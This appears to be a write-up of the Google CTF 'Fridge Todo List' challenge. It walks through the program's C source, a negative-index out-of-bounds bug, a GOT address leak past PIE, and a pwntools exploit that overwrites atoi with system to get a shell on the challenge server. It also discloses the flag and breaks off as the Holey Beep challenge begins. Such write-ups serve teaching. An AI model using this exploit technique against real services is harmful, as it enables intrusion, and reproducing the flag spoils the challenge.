β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β•šβ•β•β•β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   
β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•       β–ˆβ–ˆβ•‘   β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   
β•šβ•β•  β•šβ•β•β•šβ•β•β•β•β•β•   β•šβ•β•β•β•  β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•β• β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•        β•šβ•β•    β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•     β•šβ•β•β•β•β•β•β•β•šβ•β•β•šβ•β•β•β•β•β•β•   β•šβ•β•   
user: admin


Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> 

It seems that the service asks for a username, I entered admin thinking it would do something special, but it didn’t. We also see that we have access to a few options. The remote administration option is the most interesting, so let’s see if it works.

Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> 5


Sorry, remote administration is not available right now.

I really don’t know what I was expecting…. Anyways, let’s go ahead and download the attachment and extract the files to see what else we have to work with.

root@kali:~/Google-CTF/Fridge Todo List# ls
todo  todo.c
root@kali:~/Google-CTF/Fridge Todo List# file todo
todo: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62100af46a33d62b1f40ab39375b25f9062180af, not stripped
root@kali:~/Google-CTF/Fridge Todo List# file todo.c 
todo.c: C source, UTF-8 Unicode text

We see that we have both the todo binary and its source code. Upon viewing the source code we are provided with the following.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <err.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <stdbool.h>
#include <ctype.h>
#include <linux/limits.h>

const char BANNER[] = "\
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—        \n\
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β•β•β•    β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—       \n\
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—       β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘       \n\
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•      β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘       \n\
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•       \n\
β•šβ•β•β•β•β•β•β•β•šβ•β•     β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•   β•šβ•β•       β•šβ•β•     β•šβ•β•  β•šβ•β•β•šβ•β•β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•    β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•        \n\
                                                                                                                                          \n\
 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—     β–ˆβ–ˆβ•—     β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—\n\
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—    β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•\n\
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   \n\
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘       β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β•šβ•β•β•β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   \n\
β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•       β–ˆβ–ˆβ•‘   β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   \n\
β•šβ•β•  β•šβ•β•β•šβ•β•β•β•β•β•   β•šβ•β•β•β•  β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•β• β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•        β•šβ•β•    β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β•     β•šβ•β•β•β•β•β•β•β•šβ•β•β•šβ•β•β•β•β•β•β•   β•šβ•β•   ";

const char MENU[] = "\n\
Hi %s, what would you like to do?\n\
1) Print TODO list\n\
2) Print TODO entry\n\
3) Store TODO entry\n\
4) Delete TODO entry\n\
5) Remote administration\n\
6) Exit\n\
> ";
const char OUT_OF_BOUNDS_MESSAGE[] = "Sorry but this model only supports 128 TODO list entries.\nPlease upgrade to the Smart Fridge 3001 for increased capacity.";

#define TODO_COUNT 128
#define TODO_LENGTH 48

int todo_fd;
char username[64];
char todos[TODO_COUNT*TODO_LENGTH];

void init() {
  system("mkdir todos 2>/dev/null");
  setlinebuf(stdout);
}

void read_line(char *buf, size_t buf_sz) {
  if (!fgets(buf, buf_sz, stdin)) {
    err(1, "fgets()");
  }
  size_t read_cnt = strlen(buf);
  if (read_cnt && buf[read_cnt-1] == '\n') {
    buf[read_cnt-1] = 0;
  }
}

bool read_all(int fd, char *buf, size_t read_sz) {
  while (read_sz) {
    ssize_t num_read = read(fd, buf, read_sz);
    if (num_read <= 0) {
      return false;
    }
    read_sz -= num_read;
    buf += num_read;
  }
  return true;
}

void write_all(int fd, char *buf, size_t write_sz) {
  while (write_sz) {
    ssize_t num_written = write(fd, buf, write_sz);
    if (num_written <= 0) {
      err(1, "write");
    }
    write_sz -= num_written;
    buf += num_written;
  }
}

bool string_is_alpha(const char *s) {
  for (; *s; s++) {
    if (!isalpha(*s)) {
      return false;
    }
  }
  return true;
}

bool list_is_empty() {
  for (int i = 0; i < TODO_COUNT; i++) {
    if(todos[i*TODO_LENGTH]) {
      return false;
    }
  }
  return true;
}

void print_list() {
  if (list_is_empty()) {
    puts("Your TODO list is empty. Enjoy your free time!");
    return;
  }
  puts("+=====+=================================================================+");
  for (int i = 0; i < TODO_COUNT; i++) {
    if(todos[i*TODO_LENGTH]) {
      printf("| %3d | %-63s |\n", i, &todos[i*TODO_LENGTH]);
    }
  }
  puts("+=====+=================================================================+");
}

void open_todos() {
  char todos_filename[PATH_MAX] = "todos/";
  strncat(todos_filename, username, sizeof(todos_filename)-strlen(todos_filename) - 1);

  todo_fd = open(todos_filename, O_RDWR);
  if (todo_fd != -1 && read_all(todo_fd, todos, sizeof(todos))) {
    if (!list_is_empty()) {
      print_list();
    }
  } else {
    todo_fd = open(todos_filename, O_RDWR | O_CREAT | O_TRUNC, 0600);
    if (todo_fd == -1) {
      err(1, "Could not create TODO storage file");
    }
  }
}

void authenticate() {
  printf("user: ");
  fflush(stdout);
  read_line(username, sizeof(username));

  if (!string_is_alpha(username)) {
    errx(1, "username can only consist of [a-zA-Z]");
  }
}

int read_int() {
  char buf[128];
  read_line(buf, sizeof(buf));
  return atoi(buf);
}

void store_todos() {
  write_all(todo_fd, todos, sizeof(todos));
  close(todo_fd);
}

void store_todo() {
  printf("In which slot would you like to store the new entry? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("What's your TODO? ");
  fflush(stdout);
  read_line(&todos[idx*TODO_LENGTH], TODO_LENGTH);
}

void print_todo() {
  printf("Which entry would you like to read? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("Your TODO: %s\n", &todos[idx*TODO_LENGTH]);
}

void delete_todo() {
  printf("Which TODO number did you finish? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  todos[idx*TODO_LENGTH] = 0;
  if (list_is_empty()) {
    puts("Awesome, you cleared the whole list!");
  } else {
    puts("Nice job, keep it up!");
  }
}

bool administration_enabled() {
  return false;
}

void admin() {
  puts("Sorry, remote administration is not available right now.");
}

int main(int argc, char *argv[]) {
  init();

  puts(BANNER);

  authenticate();

  open_todos();

  while (true) {
    printf(MENU, username);
    fflush(stdout);
    int choice = read_int();
    puts("");
    switch (choice) {
      case 1:
        print_list();
        break;
      case 2:
        print_todo();
        break;
      case 3:
        store_todo();
        break;
      case 4:
        delete_todo();
        break;
      case 5:
        admin();
        break;
      case 6:
        store_todos();
        puts("Your TODO list has been stored. Have a nice day!");
        return 0;
      default:
        printf("unknown option %d\n", choice);
        break;
    }
  }
}

Looking into the code I see that option 5 runs the admin function, let’s see what that does.

bool administration_enabled() {
  return false;
}

void admin() {
  puts("Sorry, remote administration is not available right now.");
}

Well that was a bust, it doesn’t do much except for printing the string we just saw. Oh well, that doesn’t help us much, even the administration_enabled isn’t used anywhere…. We need to keep digging.

Okay, let’s start from the top choices and work our way down. When we choose the first option, case 1 is selected and it calls the print_list function.

void print_list() {
  if (list_is_empty()) {
    puts("Your TODO list is empty. Enjoy your free time!");
    return;
  }
  puts("+=====+=================================================================+");
  for (int i = 0; i < TODO_COUNT; i++) {
    if(todos[i*TODO_LENGTH]) {
      printf("| %3d | %-63s |\n", i, &todos[i*TODO_LENGTH]);
    }
  }
  puts("+=====+=================================================================+");
}

This function seems to print all the saved TODO strings from an array, nothing really wrong with this and there doesn’t seem to be a bug here.

What about option 2, which allows us to print a specific TODO entry? Looking into the code we see that option two or case 2 calls the print_todo function.

void print_todo() {
  printf("Which entry would you like to read? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("Your TODO: %s\n", &todos[idx*TODO_LENGTH]);
}

Right away I can spot an issue with this portion of the code. Take a look at the idx variable. This variable is a signed integer!

int idx = read_int();
if (idx > TODO_COUNT) {

The IF function only checks if idx is larger than TODO_COUNT which is defined at the start of the application.

#define TODO_COUNT 128

So what happens if idx is less than 0? Or a negative number? What happens then? Are we able to read outside the bound of the stack?

Let’s also see option 3 which calls the store_todo function.

void store_todo() {
  printf("In which slot would you like to store the new entry? ");
  fflush(stdout);
  int idx = read_int();
  if (idx > TODO_COUNT) {
    puts(OUT_OF_BOUNDS_MESSAGE);
    return;
  }
  printf("What's your TODO? ");
  fflush(stdout);
  read_line(&todos[idx*TODO_LENGTH], TODO_LENGTH);
}

We have the same issue! So with this we have an out-of-bound reads vulnerability, and also a write-what-where condition which should allow us to read data from the stack, and also write to it.

Let’s open the todo binary in IDA and see if we can’t find the store_todo function call.

Let’s double click on the store_todo function call to see where in memory it’s stored.

Okay, so it seems that this function is stored in the .bss section of memory which is used for statically allocated variables and the function is located at memory location 00203140.

Since we can enter a negative number, we should be able to read up the stack. So let’s scroll up in this section to see what we can read and possibly overwrite.

Awesome, it seems that the GOT or Global Offset Table, and PLT or the Procedure Linkage Table which is, used to call external procedures/functions whose address isn’t known in the time of linking, and is left to be resolved by the dynamic linker at run time.

LiveOverflow has a great video explaining the GOT and PLT, which I suggest you watch!

So if we can read from or write to these addresses in the GOT and PLT, then we can call our own function to execute whatever we want, like system.

But before we can do that, let’s check the protection in place for the application.

root@kali:~/Google-CTF/Fridge Todo List# checksec todo
[*] '/root/Google-CTF/Fridge Todo List/todo'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Darn, we can see that PIE or Position Independent Executable is enabled for this binary, this allows of the use of ASLR or address space layout randomization which in turn is used to prevent attackers from knowing where existing executable code is.

While this normally would cause headaches for certain exploits, we’re fine! Reason why is because we have the ability to read and leak memory addresses. So we can write an exploit that will leak the current memory address and use that for further exploitation, allowing us to sort of avoid having to deal with ASLR.

Also take note of the following C line in the store_todo function.

read_line(&todos[idx*TODO_LENGTH], TODO_LENGTH);

At the start of the application we define the TODO_LENGTH with the following line of code: #define TODO_LENGTH 48.

This means that we can only jump around in memory 48 bytes at a time, which isn’t much and can be a problem. Let’s see what memory addresses we can reach from our store_todo address.

root@kali:~/Google-CTF/Fridge Todo List# python
Python 2.7.15+ (default, Nov 28 2018, 16:27:22) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> todo_addrs = 0x0203140
>>> for x in range(7):
...     hex(todo_addrs - 48 * x)
... 
'0x203140'
'0x203110'
'0x2030e0'
'0x2030b0'
'0x203080'
'0x203050'
'0x203020'

Taking the last memory address of 0x203020, let’s go back into IDA, press G and enter the address.

Press OK and we should then see what memory region we can access.

Awesome, so if we jump 288 (6*48) bytes back then we end up in the GOT where the write function is stored.

Let’s write a simply python exploit to leak that address and print it out for us.

from pwn import *
import socket
import struct

s = remote('fridge-todo-list.ctfcompetition.com',1337)

s.send("admin\n")
s.send("2\n")
s.send("-6\n")
s.recvuntil("Your TODO: ")
leak = s.recvuntil("\n")[:-1]

while len(leak) < 8:
	leak += "\0"

leak = struct.unpack("<Q", leak[:8])[0]
print "Leaked Address: %x" % leak

Once we have our skeleton exploit ready, let’s execute it.

root@kali:~/Google-CTF/Fridge Todo List# python exploit.py 
[+] Opening connection to fridge-todo-list.ctfcompetition.com on port 1337: Done
Leaked Address: 55d0e28fb916
[*] Closed connection to fridge-todo-list.ctfcompetition.com port 1337

With this leaked address we see 916. We need to look for where this address is located at. Since the write function in the GOT, let’s check the PLT.

In IDA, press CTRL+S to bring up segments, and double click on the .plt segment.

Once you double click that segment you will be brought to the graph view. From there press SPACE to bring up the address view and find 916.

Awesome so we are in fact in the PLT. With the address of write we can now calculate the entry address for the PLT by subtracting 916 from our leaked address. Once that’s calculated we can then get the address of the other function calls like system by adding to the address.

So let’s find the address for system. Let’s go back into IDA and in the PLT table find system.

Double click that to follow the cross reference and we should get the address for system which should be 940.

Great, now that we have that we can update our exploit code.

from pwn import *
import socket
import struct

s = remote('fridge-todo-list.ctfcompetition.com',1337)

s.send("admin\n")
s.send("2\n")
s.send("-6\n")
s.recvuntil("Your TODO: ")
leak = s.recvuntil("\n")[:-1]

while len(leak) < 8:
	leak += "\0"

leak = (struct.unpack("<Q", leak[:8])[0]) - 0x916
print "Leaked Address: %x" % leak

system = leak - 0x940

We now need to find an address in the GOT that we want to replace. In this case I want to replace the atoi function call since it will convert ascii to integer, which occurs in our application.

Looking at the location of atoi in the GOT PLT, we see that we need to overwrite past the open function. The open function is at memory address 203080 which should be -4 from our python script when we calculated the memory offsets.

Once we know that, let’s update our exploit code to leak the addresses we need, write over the open function and overwrite atoi with the system address.

This will allow us to enter anything we want in the application which should then be executed by system.

from pwn import *
import socket
import struct

s = remote('fridge-todo-list.ctfcompetition.com',1337)

s.send("admin\n")
s.send("2\n")
s.send("-6\n")
s.recvuntil("Your TODO: ")
leak = s.recvuntil("\n")[:-1]

while len(leak) < 8:
	leak += "\0"

leak = (struct.unpack("<Q", leak[:8])[0]) - 0x916
print "Leaked Address: %x" % leak

system = leak + 0x940

s.send("3\n")
s.send("-4\n")
s.send("AAAAAAAA" + struct.pack("<Q", system) + "\n")
s.interactive()

Once we have the exploit updated, let’s execute it and see if it works.

root@kali:~/Google-CTF/Fridge Todo List# python exploit.py 
[+] Opening connection to fridge-todo-list.ctfcompetition.com on port 1337: Done
Leaked Address: 560f722a7000
[*] Switching to interactive mode

Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> 
In which slot would you like to store the new entry? What's your TODO? 
Hi admin, what would you like to do?
1) Print TODO list
2) Print TODO entry
3) Store TODO entry
4) Delete TODO entry
5) Remote administration
6) Exit
> $ ls -la
total 52
drwxr-xr-x 3 user   user     4096 Oct 24 19:04 .
drwxr-xr-x 4 nobody nogroup  4096 Oct 24 19:04 ..
-rw-r--r-- 1 user   user      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user   user     3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 user   user      655 May 16  2017 .profile
-r-sr-xr-x 1 admin  user     9000 Sep 26 15:44 holey_beep
-r-xr-xr-x 1 user   nogroup 18224 Sep 26 15:44 todo
drwxrwxrwt 2 user   user       80 Mar  1 00:49 todos

Awesome, it works! So instead of converting our input to an integer, we get system to execute our commands!

Let’s find the flag!

> $ ls -la todos
total 12
drwxrwxrwt 2 user user   80 Mar  1 00:51 .
drwxr-xr-x 3 user user 4096 Oct 24 19:04 ..
-rw-r--r-- 1 user user 6144 Mar  1 00:51 CountZero
-rw------- 1 user user    0 Mar  1 00:51 admin
> $ cat todos/CountZero
Watch Hackers (again)Figure out why the fridge keeps beepingcheck check /home/user/holey_beepdebug the fridge - toilet connectivityfollow sec advice: CTF{goo.gl/cjHknW}/4513753

And there we have it folks, the flag!

FLAG: CTF{goo.gl/cjHknW}

Holey Beep

Upon reading the challenge description we learn that with the previous exploit we see the secret cake recipe file at the root directory of the system. We also learn that the alarm on the fridge keeps sounding all the time and seems to be the sign of the Holey Beep vulnerability (yes… that’s a real vulnerability!). We need to find a way to get a root shell to read the file.

Alright, knowing that let’s download the attachment and extract all the files. We should be presented with the following binary.

root@kali:~/Google-CTF/Holy Beep# ls
holey_beep
root@kali:~/Google-CTF/Holy Beep# file holey_beep 
